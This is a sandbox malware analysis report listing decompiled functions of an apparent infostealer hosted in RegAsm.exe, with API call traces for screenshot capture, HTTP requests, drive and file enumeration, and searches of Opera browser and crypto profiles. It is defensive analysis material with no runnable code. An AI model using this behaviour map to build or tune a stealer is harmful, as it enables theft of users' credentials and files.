Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$wsprintf$Find$File$CloseFirstMatchNextPathSpec
String ID: %s\%s$%s\%s$%s\*
API String ID: 3541214880-445461498
Opcode ID: b86d1d5988e8a5b633457fbb9a5ee7423a29332bb6b218ad99de9aa99dd34375
Instruction ID: e3980370ac94f341e4db787ecefa849356652b5b9a50b55dc8137c0c02bcad1e
Opcode Fuzzy Hash: b86d1d5988e8a5b633457fbb9a5ee7423a29332bb6b218ad99de9aa99dd34375
Instruction Fuzzy Hash: FC81277190022DABCF60EF61CC45ACD77B9FB08305F0194EAE549A3150EE39AA898F94

Function 00411807 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 143memorycomtimeCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 0041180E
CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
VariantInit.OLEAUT32(?), ref: 004118DB

Part of subcall function 00411757: __EH_prolog3_catch.LIBCMT ref: 0041175E
Part of subcall function 00411757: CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,00411901,?), ref: 00411781
Part of subcall function 00411757: SysAllocString.OLEAUT32(?), ref: 0041178E
Part of subcall function 00411757: _wtoi64.MSVCRT ref: 004117C1
Part of subcall function 00411757: SysFreeString.OLEAUT32(?), ref: 004117DA
Part of subcall function 00411757: SysFreeString.OLEAUT32(00000000), ref: 004117E1

FileTimeToSystemTime.KERNEL32(?,?), ref: 0041190A
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00411916
HeapAlloc.KERNEL32(00000000), ref: 0041191D
VariantClear.OLEAUT32(?), ref: 0041195C
wsprintfA.USER32 ref: 00411949

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Strings

InstallDate, xrefs: 004118ED
Unknown, xrefs: 00411985
%d/%d/%d %d:%d:%d, xrefs: 00411943
Unknown, xrefs: 00411971
ROOT\CIMV2, xrefs: 00411862
Unknown, xrefs: 0041196A
WQL, xrefs: 0041189A
Select * From Win32_OperatingSystem, xrefs: 00411895

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
API String ID: 2280294774-461178377
Opcode ID: fe6b9a04deeaae94ce61e149b8f4aed9b6b3574a86b373e3e1773863a37c8a56
Instruction ID: 9b83a2dca4a1b3c6c0afd6b9e082c19a49acb0dc1fc89349d09b2b61b6485616
Opcode Fuzzy Hash: fe6b9a04deeaae94ce61e149b8f4aed9b6b3574a86b373e3e1773863a37c8a56
Instruction Fuzzy Hash: F7418D71940209BBCB20CBD5DC89EEFBBBDEFC9B11F20411AF611A6190D7799941CB28

Function 0041C472 Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 440COMMON

Download Yara Rule

Strings

/, xrefs: 0041C525
UT, xrefs: 0041C79D

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: /$UT
API String ID: 0-1626504983
Opcode ID: 94b155d6eae385495534a97f883fd4c918c0e8828a42b8e7b6cfe56aff5eeafa
Instruction ID: 63eef66cd8fe0e336db70064ed11a5ad7b696d25642cb4984019eb1642be8bef
Opcode Fuzzy Hash: 94b155d6eae385495534a97f883fd4c918c0e8828a42b8e7b6cfe56aff5eeafa
Instruction Fuzzy Hash: 8E027DB19442698BDF21DF64CC807EEBBB5AF45304F0440EAD948AB242D7389EC5CF99

Function 00406963 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 161networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
StrCmpCA.SHLWAPI(?), ref: 004069DF
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
InternetReadFile.WININET(?,?,000007CF,?), ref: 00406B40
InternetCloseHandle.WININET(?), ref: 00406B50
InternetCloseHandle.WININET(?), ref: 00406B5C
InternetCloseHandle.WININET(?), ref: 00406B68

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Strings

ERROR, xrefs: 00406AB6
ERROR, xrefs: 00406BAB
GET, xrefs: 00406A42

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
String ID: ERROR$ERROR$GET
API String ID: 3863758870-2509457195
Opcode ID: 79b04129377c5d4d45bac19231039a55e3dc9a9d221fd602966d56bbc965de8a
Instruction ID: 58d07afc169a1ce0b47171bb7ce7cc0903f1f08f96176c9b1f2a19a3da15bd67
Opcode Fuzzy Hash: 79b04129377c5d4d45bac19231039a55e3dc9a9d221fd602966d56bbc965de8a
Instruction Fuzzy Hash: 9D51AEB1A00269AFDF20EB60DC84AEEB7B9FB04304F0181B6F549B2190DA755EC59F94

Function 00411F55 Relevance: 24.1, APIs: 16, Instructions: 147windowCOMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00411F96
GetDesktopWindow.USER32 ref: 00411FA4
GetWindowRect.USER32(00000000,?), ref: 00411FB1
GetDC.USER32(00000000), ref: 00411FB8
CreateCompatibleDC.GDI32(00000000), ref: 00411FC1
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411FD1
SelectObject.GDI32(?,00000000), ref: 00411FDE
BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00411FFA
GetHGlobalFromStream.COMBASE(?,?), ref: 00412049
GlobalLock.KERNEL32(?), ref: 00412052
GlobalSize.KERNEL32(?), ref: 0041205E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00405482: lstrlenA.KERNEL32(?), ref: 00405519
Part of subcall function 00405482: StrCmpCA.SHLWAPI(?,00436986,0043697B,0043697A,0043696F), ref: 00405588
Part of subcall function 00405482: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA

SelectObject.GDI32(?,?), ref: 004120BC
DeleteObject.GDI32(?), ref: 004120D7
DeleteObject.GDI32(?), ref: 004120E0
ReleaseDC.USER32(00000000,00000000), ref: 004120E8
CloseWindow.USER32(00000000), ref: 004120EF

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: GlobalObject$CreateWindow$CompatibleDeleteSelectStreamlstrcpy$BitmapCloseDesktopFromInternetLockOpenRectReleaseSizelstrlen
String ID:
API String ID: 2610876673-0
Opcode ID: bda296b1393527d1300f5fae4d52867722602398b487228bc4e84d997ee74abd
Instruction ID: f6e3f0428e96004f8b83f7710fafbd9962f3d673da3a1d35a18d8dcfea6c860f
Opcode Fuzzy Hash: bda296b1393527d1300f5fae4d52867722602398b487228bc4e84d997ee74abd
Instruction Fuzzy Hash: 0251EA72800218AFDF15EFA1ED498EE7FBAFF08319F045525F901E2120E7369A55DB61

Function 0041543D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 140stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0041546A
FindFirstFileA.KERNEL32(?,?), ref: 00415481
StrCmpCA.SHLWAPI(?,00436A80), ref: 004154A2
StrCmpCA.SHLWAPI(?,00436A84), ref: 004154BC
lstrcatA.KERNEL32(?), ref: 0041550D
lstrcatA.KERNEL32(?), ref: 00415520
lstrcatA.KERNEL32(?,?), ref: 00415534
lstrcatA.KERNEL32(?,?), ref: 00415547
lstrcatA.KERNEL32(?,00436A88), ref: 00415559
lstrcatA.KERNEL32(?,?), ref: 0041556D

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

FindNextFileA.KERNEL32(?,?), ref: 00415623
FindClose.KERNEL32(?), ref: 00415637

Strings

%s\%s, xrefs: 0041545E

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
String ID: %s\%s
API String ID: 1150833511-4073750446
Opcode ID: 2e0bb3d38ea62b5c105b61d514d6becb3cb91e1da354d02d3ddcedb69e666a60
Instruction ID: 7b4a02d1ce16c29d0e311cc455c9dd4e2592c9f450b56a316f79c40a9e4a8b0e
Opcode Fuzzy Hash: 2e0bb3d38ea62b5c105b61d514d6becb3cb91e1da354d02d3ddcedb69e666a60
Instruction Fuzzy Hash: 71515FB190021D9BCF64DF60CC89AC9B7BDAB48305F1045E6E609E3250EB369B89CF65

Function 0040BF4D Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 420fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,\*.*,0043682E,0040CC6B,?,?), ref: 0040BFC5
StrCmpCA.SHLWAPI(?,00437470), ref: 0040BFE5
StrCmpCA.SHLWAPI(?,00437474), ref: 0040BFFF
StrCmpCA.SHLWAPI(?,Opera,00436843,00436842,00436837,00436836,00436833,00436832,0043682F), ref: 0040C08B
StrCmpCA.SHLWAPI(?,Opera GX), ref: 0040C099
StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 0040C0A7

Strings

Opera Crypto, xrefs: 0040C09F
\*.*, xrefs: 0040BF73
Opera GX, xrefs: 0040C091
Opera, xrefs: 0040C083

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
String ID: Opera$Opera Crypto$Opera GX$\*.*
API String ID: 2567437900-1710495004
Opcode ID: aa36165faac966798846ca3c9bce9657deccde8570b813cc5940d77252a91f8b
Instruction ID: c4b769843fd96ba5a9993bec0907288b27e6520762e28c1f4f52d27b6ca0eed4
Opcode Fuzzy Hash: aa36165faac966798846ca3c9bce9657deccde8570b813cc5940d77252a91f8b
Instruction Fuzzy Hash: 0E021D71A401299BCF21FB26DD466CD7775AF14308F4111EAB948B3191DBB86FC98F88

Function 00415142 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 146stringCOMMON

Download Yara Rule

APIs

GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004151C2
_memset.LIBCMT ref: 004151E5
GetDriveTypeA.KERNEL32(?), ref: 004151EE
lstrcpyA.KERNEL32(?,?), ref: 0041520E
lstrcpyA.KERNEL32(?,?), ref: 00415229

Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414D1C
Part of subcall function 00414CC8: FindFirstFileA.KERNEL32(?,?), ref: 00414D33
Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D4F
Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D60
Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,004369F8), ref: 00414D81
Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,004369FC), ref: 00414D9B
Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414DC2
Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,0043660F), ref: 00414DD6
Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414DFF
Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414E28
Part of subcall function 00414CC8: lstrcatA.KERNEL32(?,?), ref: 00414E3D

lstrcpyA.KERNEL32(?,00000000), ref: 0041524A
lstrlenA.KERNEL32(?), ref: 004152C4

Strings

*%DRIVE_FIXED%*, xrefs: 0041515E
*%DRIVE_REMOVABLE%*, xrefs: 0041518F
%DRIVE_FIXED%, xrefs: 00415230
%DRIVE_REMOVABLE%, xrefs: 00415215

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
API String ID: 441469471-147700698
Opcode ID: c6a03fd65228155c95557e0964fe3535a0c6996c33cf50c77044e9ee4d403a5c
Instruction ID: 002cc7b8fd832fc02ac953dee8a9373947a5751985c47ec76440b2e4c0201c02
Opcode Fuzzy Hash: c6a03fd65228155c95557e0964fe3535a0c6996c33cf50c77044e9ee4d403a5c
Instruction Fuzzy Hash: 1B512DB190021CAFDF219FA1CC85BDA7BB9FB09304F1041AAEA48A7111E7355E89CF59

Function 00401D80 Relevance: 16.3, APIs: 8, Strings: 1, Instructions: 529fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

FindFirstFileA.KERNEL32(?,?,0043A9AC,0043A9B0,004369FA,004369F7,00417908,?,00000000), ref: 00401FA4
StrCmpCA.SHLWAPI(?,0043A9B4), ref: 00401FD7
StrCmpCA.SHLWAPI(?,0043A9B8), ref: 00401FF1
FindFirstFileA.KERNEL32(?,?,0043A9BC,0043A9C0,?,0043A9C4,004369FB), ref: 004020DD

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

FindNextFileA.KERNEL32(?,?), ref: 004023A2
FindClose.KERNEL32(?), ref: 004023B6
FindNextFileA.KERNEL32(?,?), ref: 004026C6
FindClose.KERNEL32(?), ref: 004026DA

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00416E97: Sleep.KERNEL32(000003E8,?,?), ref: 00416EFE

Strings

\*.*, xrefs: 00401E9E

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
